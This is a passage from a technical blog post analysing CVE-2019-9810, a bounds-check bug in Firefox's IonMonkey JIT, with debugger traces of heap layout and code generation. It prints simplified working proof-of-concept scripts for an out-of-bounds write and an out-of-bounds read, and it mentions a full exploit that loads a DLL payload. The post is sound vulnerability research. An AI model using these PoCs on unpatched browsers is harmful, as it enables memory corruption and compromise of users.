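console.log(NurseryChunkUsableSize.toString(16)); // fffe8
console.log((16 * NurseryChunkUsableSize).toString(16)); // fffe80
```

The last value is the usable size of 16 chunks, which lines up with the Capacity field reported by !in_nursery further down.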

The way allocations are organized in this region is pretty easy: say the user asks for a 0x30 bytes allocation, the allocator returns the current position to back the allocation and simply bumps its current position by 0x30. The biggest allocation request that can go through the Nursery is 1024 bytes long (defined by js::Nursery::MaxNurseryBufferSize); a request that exceeds this size is usually serviced from the jemalloc heap (which is the third heap in Firefox: Nursery, Tenured and jemalloc).

When a chunk is full, the Nursery can allocate another one if it hasn't reached its maximum size yet; in that case it sets up a new js::NurseryChunk (as in the above call-stack) and makes it the current one. If the Nursery has reached its maximum capacity, it triggers a minor garbage collection which collects the objects that need collection (the ones that have no references anymore) and moves all the objects still alive to the Tenured heap. This gives back a clean slate for the Nursery.

Even though the Nursery doesn't keep track of the various objects it has allocated, they are all allocated contiguously, so the runtime is able to iterate over the objects one by one: it works out the boundary of the current object and moves on to the next. Pretty cool.
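
The bump allocation scheme described above fits in a few lines. The sketch below is a toy: the ToyNursery class and its fields are invented, it hands out offsets instead of real memory, and its minorGC only resets the state instead of moving survivors to the Tenured heap. The sizes are the ones quoted in this section.

```javascript
// Minimal bump allocator in the spirit of the Nursery.
class ToyNursery {
  constructor(maxChunks) {
    this.usablePerChunk = 0xfffe8; // usable bytes in one chunk
    this.maxBufferSize = 1024; // biggest request the Nursery accepts
    this.maxChunks = maxChunks;
    this.currentChunk = 0;
    this.position = 0; // offset inside the current chunk
    this.minorGCs = 0;
  }

  allocate(size) {
    if (size > this.maxBufferSize) {
      return null; // too big: would be serviced by another heap
    }
    if (this.position + size > this.usablePerChunk) {
      if (this.currentChunk + 1 < this.maxChunks) {
        this.currentChunk++; // move on to a fresh chunk
      } else {
        this.minorGC(); // nursery full: start over with a clean slate
      }
      this.position = 0;
    }
    const offset = this.position;
    this.position += size; // the "bump"
    return { chunk: this.currentChunk, offset };
  }

  minorGC() {
    this.minorGCs++;
    this.currentChunk = 0;
  }
}

const nursery = new ToyNursery(16);
const first = nursery.allocate(0x30);
const second = nursery.allocate(0x30);
console.log(first.offset, second.offset); // 0 48
console.log(nursery.allocate(0x800)); // null
```

Because the only state is a position, there is nothing like a free list to groom: consecutive allocations simply end up next to each other.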

While writing up this section I also added a new utility command in sm.js called !in_nursery <addr> that tells you if addr belongs to the Nursery or not. On top of that, it shows you interesting information about its internal state. This is what it looks like:

0:008> !in_nursery 0x19767e00df8
Using previously cached JSContext @0x000001fe17318000
0x000001fe1731cde8: js::Nursery
ChunkCountLimit: 0x0000000000000010 (16 MB)
Capacity: 0x0000000000fffe80 bytes
CurrentChunk: 0x0000019767e00000
Position: 0x0000019767e00eb0
Chunks:
00: [0x0000019767e00000 - 0x0000019767efffff]
01: [0x00001fa2aee00000 - 0x00001fa2aeefffff]
02: [0x0000115905000000 - 0x00001159050fffff]
03: [0x00002fc505200000 - 0x00002fc5052fffff]
04: [0x000020d078700000 - 0x000020d0787fffff]
05: [0x0000238217200000 - 0x00002382172fffff]
06: [0x00003ff041f00000 - 0x00003ff041ffffff]
07: [0x00001a5458700000 - 0x00001a54587fffff]
-------
0x19767e00df8 has been found in the js::NurseryChunk @0x19767e00000!


Understanding what happens to Arr

The first thing that was bothering me is the very specific number of items the array is instantiated with:

Arr = new Array(0x7e);


People following at home will also notice that modifying this constant takes us from a PoC that crashes reliably to... a PoC that may not even crash anymore.

Let's start at the beginning and gather information. This is an array that gets allocated in the Nursery (also called DefaultHeap) with the OBJECT2_BACKGROUND kind which means it is 0x30 bytes long - basically just enough to pack a js::NativeObject (0x20 bytes) as well as a js::ObjectElements (0x10 bytes):

0:000> ?? sizeof(js!js::NativeObject) + sizeof(js!js::ObjectElements)
unsigned int64 0x30

0:000> r
js!js::AllocateObject<js::CanGC>:

0:000> ?? kind
js::gc::AllocKind OBJECT2_BACKGROUND (0n5)

0:000> x js!js::gc::Arena::ThingSizes
00007ff788133fe0 js!js::gc::Arena::ThingSizes = <no type information>

0:000> dds 00007ff788133fe0 + (5 * 4) l1
00007ff788133ff4  00000030

0:000> kc
# Call Site
00 js!js::AllocateObject<js::CanGC>
01 js!js::ArrayObject::createArray
02 js!NewArrayTryUseGroup<2046>
03 js!ArrayConstructorImpl
04 js!js::ArrayConstructor
05 js!InternalConstruct
06 js!Interpret
07 js!js::RunScript
08 js!js::ExecuteKernel
09 js!js::Execute
0a js!JS_ExecuteScript
0b js!Process
0c js!main
0d js!__scrt_common_main_seh


You might be wondering where the space for the 0x7e elements is, though. Well, once the shell of the object is constructed, it grows the elements_ space to be able to store that many elements. The number of elements is adjusted in js::NativeObject::goodElementsAllocationAmount to 0x80 and then js::NativeObject::growElements calls into the Nursery allocator to allocate 0x80 * sizeof(JS::Value) = 0x400 bytes (which is coincidentally the biggest allocation that the Nursery can service, as we've seen in the previous section):

0:000>
js!js::NativeObject::goodElementsAllocationAmount+0x264:
00007ff6e5dbfae4 418909          mov     dword ptr [r9],ecx ds:00000028cc9fe9ac=00000000

0:000> r @ecx
ecx=80

0:000> kc
# Call Site
00 js!js::NativeObject::goodElementsAllocationAmount
01 js!js::NativeObject::growElements
02 js!NewArrayTryUseGroup<2046>
03 js!ArrayConstructorImpl
04 js!js::ArrayConstructor
05 js!InternalConstruct
06 js!Interpret
07 js!js::RunScript
08 js!js::ExecuteKernel
09 js!js::Execute
0a js!JS_ExecuteScript
0b js!Process
0c js!main

...

0:000> t
js!js::Nursery::allocateBuffer:
00007ff6e6029c70 4156            push    r14

0:000> r @r8
r8=0000000000000400

0:000> kc
# Call Site
00 js!js::Nursery::allocateBuffer
01 js!js::NativeObject::growElements
02 js!NewArrayTryUseGroup<2046>
03 js!ArrayConstructorImpl
04 js!js::ArrayConstructor
05 js!InternalConstruct
06 js!Interpret
07 js!js::RunScript
08 js!js::ExecuteKernel
09 js!js::Execute
0a js!JS_ExecuteScript
0b js!Process
0c js!main


Once the allocation is done, it copies the old elements_ content into the new one, updates the Array object and we are done with our Array:

0:000> dt js::NativeObject @r14 elements_
+0x018 elements_        : 0x000000c9ffb000f0 js::HeapSlot

0:000> dqs @r14
000000c9ffb000b0  00002bf2fa07deb0
000000c9ffb000b8  00002bf2fa0987e8
000000c9ffb000c0  0000000000000000
000000c9ffb000c8  000000c9ffb000f0
000000c9ffb000d0  0000000000000000 <- Lost / unused space
000000c9ffb000d8  0000007e00000000 <- Lost / unused space
000000c9ffb000e0  0000000000000000
000000c9ffb000e8  0000007e0000007e

000000c9ffb000f0  2f2f2f2f2f2f2f2f
000000c9ffb000f8  2f2f2f2f2f2f2f2f
000000c9ffb00100  2f2f2f2f2f2f2f2f
000000c9ffb00108  2f2f2f2f2f2f2f2f
000000c9ffb00110  2f2f2f2f2f2f2f2f
000000c9ffb00118  2f2f2f2f2f2f2f2f
000000c9ffb00120  2f2f2f2f2f2f2f2f
000000c9ffb00128  2f2f2f2f2f2f2f2f


One small remark is that because we first allocated 0x30 bytes, we originally had the js::ObjectElements at 000000c9ffb000d0. Because we needed a bigger space, we allocated space for 0x7e elements and two more JS::Value (in size) to be able to store the new js::ObjectElements (this object is always right before the content of the array). The result of this is the old js::ObjectElements at 000000c9ffb000d0/8 is now unused / lost space; which is kinda fun I suppose :).
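
The arithmetic behind the 0x7e constant can be checked quickly. This is a sketch that only uses sizes quoted in the text (8-byte JS::Value, 0x10-byte js::ObjectElements, 1024-byte Nursery limit); the elementsBytes helper is hypothetical and ignores whatever extra rounding goodElementsAllocationAmount may apply.

```javascript
const VALUE_SIZE = 8; // sizeof(JS::Value)
const VALUES_PER_HEADER = 2; // js::ObjectElements is 0x10 bytes, i.e. two Values
const MAX_NURSERY_BUFFER = 1024; // biggest request the Nursery services

// Bytes needed for `count` elements plus the header placed in front of them.
function elementsBytes(count) {
  return (count + VALUES_PER_HEADER) * VALUE_SIZE;
}

console.log(elementsBytes(0x7e).toString(16)); // 400
console.log(elementsBytes(0x7e) <= MAX_NURSERY_BUFFER); // true
console.log(elementsBytes(0x7f) <= MAX_NURSERY_BUFFER); // false

// Low byte of the addresses in the dump: the object sits at ...b0, is 0x30
// bytes long, and the elements start right after the 0x10-byte header.
console.log((0xb0 + 0x30 + 0x10).toString(16)); // f0
```

So 0x7e is the largest element count whose buffer, header included, still fits in a single Nursery allocation.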

This is also very similar to what happens when we trigger the Arr.length = 0 statement; the Nursery allocator is invoked to replace the to-be-shrunk elements_ array. This is implemented in js::NativeObject::shrinkElements. This time 8 (which is the minimum and is defined as js::NativeObject::SLOT_CAPACITY_MIN) is returned by js::NativeObject::goodElementsAllocationAmount which results in an allocation request of 8*8=0x40 bytes from the Nursery. js::Nursery::reallocateBuffer decides that this is a no-op because the new size (0x40) is smaller than the old one (0x400) and because the chunk is backed by a Nursery buffer:

void* js::Nursery::reallocateBuffer(JSObject* obj, void* oldBuffer,
size_t oldBytes, size_t newBytes) {
// ...
/* The nursery cannot make use of the returned slots data. */
if (newBytes < oldBytes) {
return oldBuffer;
}
// ...
}


And as a result, our array basically stays the same; only the js::ObjectElements part is updated:

0:000> !smdump_jsobject 0x00000c9ffb000b0
c9ffb000b0: js!js::ArrayObject:            Length: 0 <- Updated length
c9ffb000b0: js!js::ArrayObject:          Capacity: 6 <- This is js::NativeObject::SLOT_CAPACITY_MIN - js::ObjectElements::VALUES_PER_HEADER
c9ffb000b0: js!js::ArrayObject: InitializedLength: 0
c9ffb000b0: js!js::ArrayObject:           Content: []
@$smdump_jsobject(0x00000c9ffb000b0)

0:000> dt js::NativeObject 0x00000c9ffb000b0 elements_
+0x018 elements_        : 0x000000c9ffb000f0 js::HeapSlot


Now if you think about it we are able to store arbitrary values in out-of-bounds memory. We fully control the content, and we somewhat control the offset (up to the size of the initial array). But how can we overwrite actually useful data?

Sure, we can make sure to have our array followed by something interesting. Although, if you think about it, we will shrink back the array length to zero and then trigger the vulnerability. Well, by design the object we placed behind us is not reachable by our index because it was precisely adjacent to the original array. So this is not enough and we need to find a way to have the shrunken array moved into a region where it becomes adjacent to something interesting. In this case we will end up with interesting corruptible data within reach of our out-of-bounds write.

A minor-gc should do the trick as it walks the Nursery, collects the objects that need collection and moves all the other ones to the Tenured heap. When this happens, it is fair to guess that we get moved to a memory chunk that can just fit the new object.

Code generation with IonMonkey

Before beginning, one thing that you might have been wondering at this point is where do we actually check the implementation of the code generation for a given LIR instruction? (MIR gets lowered to LIR and code-generation kicks in to generate native code) Like how does storeelement get lowered to native code (does MIR storeelement get translated to LIR LStoreElement instruction?) This would be useful for us to know a bit more about the out-of-bounds memory access we can trigger.

You can find those details in what is called the CodeGenerator which lives in src/jit/CodeGenerator.cpp.
For example, you can quickly see that most of the code generation related to the arrayslice instruction happens in js::ArraySliceDense:

void CodeGenerator::visitArraySlice(LArraySlice* lir) {
  Register object = ToRegister(lir->object());
  Register begin = ToRegister(lir->begin());
  Register end = ToRegister(lir->end());
  Register temp1 = ToRegister(lir->temp1());
  Register temp2 = ToRegister(lir->temp2());

  Label call, fail;

  // Try to allocate an object.
  TemplateObject templateObject(lir->mir()->templateObj());
  masm.createGCObject(temp1, temp2, templateObject, lir->mir()->initialHeap(),
                      &fail);

  // Fixup the group of the result in case it doesn't match the template object.
  masm.copyObjGroupNoPreBarrier(object, temp1, temp2);

  masm.jump(&call);
  {
    masm.bind(&fail);
    masm.movePtr(ImmPtr(nullptr), temp1);
  }
  masm.bind(&call);

  pushArg(temp1);
  pushArg(end);
  pushArg(begin);
  pushArg(object);

  using Fn =
      JSObject* (*)(JSContext*, HandleObject, int32_t, int32_t, HandleObject);
  callVM<Fn, ArraySliceDense>(lir);
}


Most of the MIR instructions translate one-to-one to a LIR instruction (MIR instructions start with an M like MStoreElement, and LIR instructions start with an L like LStoreElement); there are about 309 different MIR instructions (see objdir/js/src/jit/MOpcodes.h) and 434 LIR instructions (see objdir/js/src/jit/LOpcodes.h). The jit::CodeGenerator::visitArraySlice function is directly invoked from js::jit::CodeGenerator::generateBody in a switch statement dispatching every LIR instruction to its associated handler (note that I have cleaned-up the function below by removing a bunch of ifdef blocks that are useless for our investigation):

bool CodeGenerator::generateBody() {
  JitSpew(JitSpew_Codegen, "==== BEGIN CodeGenerator::generateBody ====\n");
  IonScriptCounts* counts = maybeCreateScriptCounts();

  for (size_t i = 0; i < graph.numBlocks(); i++) {
    current = graph.getBlock(i);

    // Don't emit any code for trivial blocks, containing just a goto. Such
    // blocks are created to split critical edges, and if we didn't end up
    // putting any instructions in them, we can skip them.
    if (current->isTrivial()) {
      continue;
    }

    masm.bind(current->label());

    mozilla::Maybe<ScriptCountBlockState> blockCounts;
    if (counts) {
      blockCounts.emplace(&counts->block(i), &masm);
      if (!blockCounts->init()) {
        return false;
      }
    }

    TrackedOptimizations* last = nullptr;

    for (LInstructionIterator iter = current->begin(); iter != current->end();
         iter++) {
      if (!alloc().ensureBallast()) {
        return false;
      }

      if (counts) {
        blockCounts->visitInstruction(*iter);
      }

      if (iter->mirRaw()) {
        // Only add instructions that have a tracked inline script tree.
        if (iter->mirRaw()->trackedTree()) {
          if (!addNativeToBytecodeEntry(iter->mirRaw()->trackedSite())) {
            return false;
          }
        }

        // Track the start native offset of optimizations.
        if (iter->mirRaw()->trackedOptimizations()) {
          if (last != iter->mirRaw()->trackedOptimizations()) {
            DumpTrackedSite(iter->mirRaw()->trackedSite());
            DumpTrackedOptimizations(iter->mirRaw()->trackedOptimizations());
            last = iter->mirRaw()->trackedOptimizations();
          }

          if (!addTrackedOptimizationsEntry(
                  iter->mirRaw()->trackedOptimizations())) {
            return false;
          }
        }
      }

      setElement(*iter);  // needed to encode correct snapshot location.

      switch (iter->op()) {
#ifndef JS_CODEGEN_NONE
# define LIROP(op)               \
    case LNode::Opcode::op:      \
      visit##op(iter->to##op()); \
      break;
        LIR_OPCODE_LIST(LIROP)
# undef LIROP
#endif
        case LNode::Opcode::Invalid:
        default:
          MOZ_CRASH("Invalid LIR op");
      }

      // Track the end native offset of optimizations.
      if (iter->mirRaw() && iter->mirRaw()->trackedOptimizations()) {
        extendTrackedOptimizationsEntry(iter->mirRaw()->trackedOptimizations());
      }
    }

    if (masm.oom()) {
      return false;
    }
  }

  JitSpew(JitSpew_Codegen, "==== END CodeGenerator::generateBody ====\n");
  return true;
}


After theory, let's practice a bit and try to apply all of this learning against the PoC file.
Here is what I would like us to do: let's try to break into the assembly code generated by Ion for the function Target. Then, let's find the boundscheck so that we can trace forward and witness every step of the bug:

1. Checking Idx against the initializedLength of the array
2. Storing the integer 0x41414141 inside the array's elements_ memory space
3. Calling slice on Special and making sure the size of Arr has been shrunk and that it is now 0
4. Finally, witnessing the out-of-bounds store

Before diving in, here is the code that generates the assembly code for the boundscheck instruction:

void CodeGenerator::visitBoundsCheck(LBoundsCheck* lir) {
  const LAllocation* index = lir->index();
  const LAllocation* length = lir->length();
  LSnapshot* snapshot = lir->snapshot();

  if (index->isConstant()) {
    // Use uint32 so that the comparison is unsigned.
    uint32_t idx = ToInt32(index);
    if (length->isConstant()) {
      uint32_t len = ToInt32(lir->length());
      if (idx < len) {
        return;
      }
      bailout(snapshot);
      return;
    }

    if (length->isRegister()) {
      bailoutCmp32(Assembler::BelowOrEqual, ToRegister(length), Imm32(idx),
                   snapshot);
    } else {
      bailoutCmp32(Assembler::BelowOrEqual, ToAddress(length), Imm32(idx),
                   snapshot);
    }
    return;
  }

  Register indexReg = ToRegister(index);
  if (length->isConstant()) {
    bailoutCmp32(Assembler::AboveOrEqual, indexReg, Imm32(ToInt32(length)),
                 snapshot);
  } else if (length->isRegister()) {
    bailoutCmp32(Assembler::BelowOrEqual, ToRegister(length), indexReg,
                 snapshot);
  } else {
    bailoutCmp32(Assembler::BelowOrEqual, ToAddress(length), indexReg,
                 snapshot);
  }
}

According to the code above, we can expect to have a cmp instruction emitted with two registers: the index and the length, as well as a conditional branch for bailing out if the index is greater than or equal to the length (the comparison is unsigned).
In our case, one thing to keep in mind is that the length is the initializedLength of the array and not the actual length as you can see in the MIR code:

18 | initializedlength elements17:Elements
19 | boundscheck unbox10:Int32 initializedlength18:Int32

Now let's get back to observing the PoC in action. One easy way that I found to break in a function generated by Ion right before it adds the native code for a specific LIR instruction is to set a breakpoint in the code generator for the instruction of your choice (or on js::jit::CodeGenerator::generateBody if you want to break at the entry point of the function) and then modify its internal buffer in order to add an int3 in the generated code. This is another command that I added to sm.js called !ion_insertbp.

Check Idx against the initializedLength of the array

In our case, we are interested in breaking right before the boundscheck so let's set a breakpoint on js!js::jit::CodeGenerator::visitBoundsCheck, invoke !ion_insertbp and then we should be off to the races:

0:008> g
Breakpoint 0 hit
js!js::jit::CodeGenerator::visitBoundsCheck:
00007ff6e62de1a0 4156            push    r14

0:000> !ion_insertbp
unsigned char 0xcc ''
unsigned int64 0xff
@$ion_insertbp()

0:000> g
(224c.2914): Break instruction exception - code 80000003 (first chance)
0000035c97b8b299 cc              int     3

0:000> u . l2
0000035c97b8b299 cc              int     3
0000035c97b8b29a 3bd9            cmp     ebx,ecx

0:000> t
0000035c97b8b29a 3bd9            cmp     ebx,ecx

0:000> r.
ebx=0000000000000031  ecx=0000000000000030


Sweet; this cmp is basically the boundscheck instruction that compares the initializedLength (0x31) of the array (because we initialized Arr[0x30] a bunch of times when warming-up the JIT) to Idx which is 0x30. The index is in bounds and so the code doesn't bail out and keeps going forward.
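
To make the condition concrete, here is a tiny model of that check written in JavaScript. It is only a sketch of the comparison described above (bail out when the length is below or equal to the index, both treated as unsigned 32-bit integers); the function name boundsCheckBailsOut is made up for the illustration and is not something that exists in SpiderMonkey.

```javascript
// Hypothetical model of the emitted boundscheck: the JIT'ed code bails out
// when `length <= index`, comparing both values as unsigned 32-bit integers.
function boundsCheckBailsOut(index, initializedLength) {
  const idx = index >>> 0;              // reinterpret as uint32
  const len = initializedLength >>> 0;  // reinterpret as uint32
  return len <= idx;
}

// Values taken from the trace above: ebx=0x31 (initializedLength), ecx=0x30 (Idx).
console.log(boundsCheckBailsOut(0x30, 0x31)); // false: in bounds, keep going
console.log(boundsCheckBailsOut(0x31, 0x31)); // true: first uninitialized slot
console.log(boundsCheckBailsOut(-1, 0x31));   // true: negative index wraps to a huge uint32
```

The unsigned comparison is what lets a single cmp reject both too-large and negative indices.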

Storing the integer 0x41414141 inside the array's elements_ memory space

If we trace a little further we can see the generated code that stores the integer 0x41414141 into the array at the index 0x30:

0:000>

0:000>
0000035c97b8b2b7 4c891cea        mov     qword ptr [rdx+rbp*8],r11 ds:000031eac7502348=fff88000000003e6

0:000> r @rdx,@rbp
rdx=000031eac75021c8 rbp=0000000000000030


And then the invocation of slice:

0:000>
0000035c97b8b34b e83060ffff      call    0000035c97b81380

0:000> t
00000289d04b1380 48b9008021d658010000 mov rcx,158D6218000h

0:000> u . l20
...
0000035c97b813c6 e815600000      call    0000035c97b873e0

0:000> u 0000035c97b873e0 l1
0000035c97b873e0 ff2502000000    jmp     qword ptr [0000035c97b873e8]

0:000> dqs 0000035c97b873e8 l1
0000035c97b873e8  00007ff6e5c642a0 js!js::ArraySliceDense [c:\work\codes\mozilla-central\js\src\builtin\Array.cpp @ 3637]


Calling slice on Special

The next step is to make sure we triggered the side-effect and shrunk Arr right after the slicing operation (note that I added code in the PoC to print the address of Arr before and after the gc call, otherwise we would have no way of getting its address). To witness that, we have to do some more work to break on the right iteration (when Trigger is set to true), otherwise the function doesn't shrink Arr. Waiting for that iteration also ensures that we warmed-up the JIT enough and that the function has been JIT'ed.

An easy way to break at the right iteration is by looking for something unique about it, like the fact that we use a different index: 0x20 instead of 0x30. For example, we can easily detect that with a breakpoint as below (on the cmp instruction for the boundscheck instruction):

0:000> bp 0000035c97b8b29a ".if(@ecx == 0x20){}.else{gc}"

0:000> eb 0000035c97b8b299 90

0:000> g
0000035c97b8b29a 3bd9            cmp     ebx,ecx

0:000> r.
ebx=0000000000000031  ecx=0000000000000020


Now we can head straight-up to js::ArraySliceDense:

0:000> g js!js::ArraySliceDense+0x40d
js!js::ArraySliceDense+0x40d:
00007ff6e5c646ad e8eee2ffff      call    js!js::array_slice (00007ff6e5c629a0)

0:000> ? 000031eac75021c8 - (2*8) - (2*8) - 20
Evaluate expression: 54884436025736 = 000031eac7502188

0:000> !smdump_jsobject 0x00031eac7502188
31eac7502188: js!js::ArrayObject:            Length: 126
31eac7502188: js!js::ArrayObject:          Capacity: 126
31eac7502188: js!js::ArrayObject: InitializedLength: 49
31eac7502188: js!js::ArrayObject:           Content: [magic, magic, magic, magic, magic, magic, magic, magic, magic, magic, ...]
@$smdump_jsobject(0x00031eac7502188)

0:000> p
js!js::ArraySliceDense+0x412:
00007ff6e5c646b2 48337c2450      xor     rdi,qword ptr [rsp+50h] ss:000000bd675fd270=fffe2d69e5e05100

We grab the address of the array after the gc on stdout and let's see (the array got moved from 0x00031eac7502188 to 0x0002B0A9D08F160):

0:000> !smdump_jsobject 0x0002B0A9D08F160
2b0a9d08f160: js!js::ArrayObject:            Length: 0
2b0a9d08f160: js!js::ArrayObject:          Capacity: 6
2b0a9d08f160: js!js::ArrayObject: InitializedLength: 0
2b0a9d08f160: js!js::ArrayObject:           Content: []
@$smdump_jsobject(0x0002B0A9D08F160)


Witnessing the out-of-bounds store

And now the last stop is to observe the actual out-of-bounds happening.

0:000>
0000035c97b8b35d 8914c8          mov     dword ptr [rax+rcx*8],edx ds:00002b0a9d08f290=4f4f4f4f

0:000> r.
rcx=0000000000000020  rax=00002b0a9d08f190  edx=00000000000000bb

0:000> t
0000035c97b8b360 c744c8040080f8ff mov     dword ptr [rax+rcx*8+4],0FFF88000h ds:00002b0a9d08f294=4f4f4f4f


In the above @rax is the elements_ pointer that has a capacity of only 6 js::Value which means the only possible values of the index (@rcx here) should be in [0 - 5]. In summary, we are able to write an integer js::Value which means we can control the lower 4 bytes but cannot control the upper 4 (that will be FFF88000). Thus, an ideal corruption target (doesn't mean this is the only thing we could do either) for this primitive is the size of an array-like structure that is stored as a js::Value. Turns out this is exactly how the size of a TypedArray is stored - if you don't remember go have a look at my previous article Introduction to SpiderMonkey exploitation :).
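
To visualize what lands in memory, here is a small sketch that rebuilds the 64-bit pattern of an integer js::Value from the two dword stores seen in the trace above. The constant name JSVAL_TAG_INT32 and the helper boxInt32 are names I made up for the illustration; only the 0xFFF88000 upper dword comes from the trace.

```javascript
// Upper dword written by the second `mov` in the trace above. The constant
// name is hypothetical; only the value comes from the debugger output.
const JSVAL_TAG_INT32 = 0xfff88000n;

// Rebuild the qword that ends up in memory for an int32 js::Value:
// attacker-controlled lower 32 bits, fixed upper 32 bits.
function boxInt32(value) {
  const payload = BigInt(value >>> 0);
  return (JSVAL_TAG_INT32 << 32n) | payload;
}

console.log(boxInt32(0xbb).toString(16));       // fff88000000000bb
console.log(boxInt32(0x41414141).toString(16)); // fff8800041414141
```

Whatever we overwrite therefore ends up looking like fff88000XXXXXXXX, which is why a field that is itself stored as an integer js::Value is such a convenient target.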

In our case, if we look at the neighboring memory we find another array right behind us:

0:000> dqs 0x0002B0A9D08F160 l100
00002b0a9d08f160  00002b0a9d07dcd0
00002b0a9d08f168  00002b0a9d0987e8
00002b0a9d08f170  0000000000000000
00002b0a9d08f178  00002b0a9d08f190
00002b0a9d08f180  0000000000000000
00002b0a9d08f188  0000000000000006
00002b0a9d08f190  fffa800000000000
00002b0a9d08f198  fffa800000000000
00002b0a9d08f1a0  fffa800000000000
00002b0a9d08f1a8  fffa800000000000
00002b0a9d08f1b0  fffa800000000000
00002b0a9d08f1b8  fffa800000000000

00002b0a9d08f1c0  00002b0a9d07dc40 <- another array starting here
00002b0a9d08f1c8  00002b0a9d098890
00002b0a9d08f1d0  0000000000000000
00002b0a9d08f1d8  00002b0a9d08f1f0 <- elements_
00002b0a9d08f1e0  0000000000000000
00002b0a9d08f1e8  0000000000000006
00002b0a9d08f1f0  2f2f2f2f2f2f2f2f
00002b0a9d08f1f8  2f2f2f2f2f2f2f2f
00002b0a9d08f200  2f2f2f2f2f2f2f2f
00002b0a9d08f208  2f2f2f2f2f2f2f2f
00002b0a9d08f210  2f2f2f2f2f2f2f2f
00002b0a9d08f218  2f2f2f2f2f2f2f2f


So one way to get the interpreter to crash reliably is to overwrite its elements_ with a js::Value. This should crash the interpreter when the GC tries to collect the elements_ buffer, as it won't even be a valid pointer. This field is reachable with the index 9 and so we just have to modify this line:

    Target(Snowflake, 0x9, 0xBB);


(d0.348c): Access violation - code c0000005 (!!! second chance !!!)
js!js::gc::Arena::finalize<JSObject>+0x12e:
00007ff6e601eb2e 8b43f0          mov     eax,dword ptr [rbx-10h] ds:fff88000000000ab=????????

0:000> kc
# Call Site
00 js!js::gc::Arena::finalize<JSObject>
01 js!FinalizeTypedArenas<JSObject>
02 js!FinalizeArenas
03 js!js::gc::ArenaLists::backgroundFinalize
04 js!js::gc::GCRuntime::sweepBackgroundThings
09 js!js::gc::GCRuntime::endSweepingSweepGroup
0a js!sweepaction::SweepActionSequence<js::gc::GCRuntime *,js::FreeOp *,js::SliceBudget &>::run
0b js!sweepaction::SweepActionRepeatFor<js::gc::SweepGroupsIter,JSRuntime *,js::gc::GCRuntime *,js::FreeOp *,js::SliceBudget &>::run
0c js!js::gc::GCRuntime::performSweepActions
0d js!js::gc::GCRuntime::incrementalSlice
0e js!js::gc::GCRuntime::gcCycle
0f js!js::gc::GCRuntime::collect
10 js!js::gc::GCRuntime::gc
11 js!JSRuntime::destroyRuntime
12 js!js::DestroyContext
13 js!main
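
As a sanity check, the index 9 used to trigger this crash can be derived from the memory dump with a bit of pointer arithmetic. The sketch below does that with BigInt; the addresses are copied from the dump above, while the helper name elementIndexFor is hypothetical.

```javascript
// Every slot in elements_ is a js::Value, which is 8 bytes wide.
const SIZEOF_JSVALUE = 8n;

// Hypothetical helper: which index of `elementsPtr` lands on `targetAddr`?
function elementIndexFor(elementsPtr, targetAddr) {
  const delta = targetAddr - elementsPtr;
  if (delta % SIZEOF_JSVALUE !== 0n) {
    throw new RangeError("target is not aligned on a js::Value slot");
  }
  return delta / SIZEOF_JSVALUE;
}

// Addresses copied from the dqs output above.
const arrElements = 0x2b0a9d08f190n;           // Arr's elements_ after the shrink
const neighborElementsField = 0x2b0a9d08f1d8n; // neighboring array's elements_ field

console.log(elementIndexFor(arrElements, neighborElementsField)); // 9n

// Conversely, index 0x20 is the address the out-of-bounds store hit earlier.
console.log((arrElements + 0x20n * SIZEOF_JSVALUE).toString(16)); // 2b0a9d08f290
```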


Simplifying the PoC

OK so with this internal knowledge that we have gone through, we understand enough of the pieces at play to simplify the PoC. It's always good to verify assumptions in practice and so it'll be a good exercise to see if what we have learned above sticks.

First, we do not need an array of size 0x7e. Because the corruption target that we identified above is reachable at the index 0x20 (remember it's the neighboring array's elements_ field), we need the array to be able to store 0x21 elements. This is just to satisfy the boundscheck before we can shrink it.

We also know that the only role that the 0x30 index constant has been serving is to make sure that the first 0x31 elements in the array (indices 0 through 0x30) have been properly initialized. As the boundscheck operates against the initializedLength of the array, if we try to access an index at or past it we will take a bailout. An easy way to not worry about this at all is to fully initialize the array with a .fill(0) for example. Once this is done we can update the first index and use 0 instead of 0x30.

After all the modifications this is what you end up with:

let Trigger = false;
let Arr = null;

function Target(Special, Idx, Value) {
Arr[Idx] = 0x41414141;
Special.slice();
Arr[Idx] = Value;
}

class SoSpecial extends Array {
static get [Symbol.species]() {
return function() {
if(!Trigger) {
return;
}

Arr.length = 0;
gc();
};
}
};

function main() {
const Snowflake = new SoSpecial();
Arr = new Array(0x21);
Arr.fill(0);
for(let Idx = 0; Idx < 0x400; Idx++) {
Target(Snowflake, 0, Idx);
}

Trigger = true;
Target(Snowflake, 0x20, 0xBB);
}

main();


Conclusion

I've wanted to look at IonMonkey for quite some time and this was a good opportunity (and a good spot to stop for now!). We have covered quite a bit of content but obviously the engine is even more complicated as there are a bunch of things I haven't really studied yet.

At least we have uncovered the secrets of CVE-2019-9810 and its PoC as well as developed a few more commands for sm.js. For those that are interested in the exploit, you can find it here: CVE-2019-9810. It exploits Firefox on Windows 64-bit and loads a reflective DLL that embeds the payload. The payload infects the other tabs and sets up a hook to inject arbitrary JavaScript. The demo payload replaces the background of every visited website with the blog's background theme and redirects every link to doar-e.github.io :).

If this was interesting for you, you might want to have a look at those other good resources concerning IonMonkey:

And if you want a bit more, what follows is a bunch of extra questions you might have asked yourself while reading that I answer (but that did not really fit the overall narrative) as well as a few puzzles if you want to explore Ion even more!

Little puzzles & extra quests

As said above, here are a bunch of extra questions / puzzles that did not really fit in the narrative. This does not mean they are not interesting so I just decided to stuff them here :).

Why does AccessArray(10) trigger a bailout?

let Arr = null;
function AccessArray(Idx) {
Arr[Idx] = 0xaaaaaaaa;
}

Arr = new Array(0x100);
for(let Idx = 0; Idx < 0x400; Idx++) {
AccessArray(1);
}

AccessArray(10);


Can the write out-of-bounds be transformed into an information disclosure?

It can! We can abuse the loadelement MIR instruction the same way we abused storeelement in which case we can read out-of-bounds memory.

let Trigger = false;
let Arr = null;

function Target(Special, Idx) {
Arr[Idx];
Special.slice();
return Arr[Idx];
}

class SoSpecial extends Array {
static get [Symbol.species]() {
return function() {
if(!Trigger) {
return;
}

Arr.length = 0;
gc();
};
}
};

function main() {
const Snowflake = new SoSpecial();
Arr = new Array(0x7e);
Arr.fill(0);
for(let Idx = 0; Idx < 0x400; Idx++) {
Target(Snowflake, 0x0);
}

Trigger = true;
print(Target(Snowflake, 0x6));
}

main();


What's a good way to check if the engine is vulnerable?

The most reliable way I found to check if the engine is vulnerable is to actually use the vulnerability as an out-of-bounds read. At this point, there are two possible outcomes: correct execution should return undefined as the array has a size of 0, or you read leftover data in which case the engine is vulnerable.

let Trigger = false;
let Arr = null;

function Target(Special, Idx) {
Arr[Idx];
Special.slice();
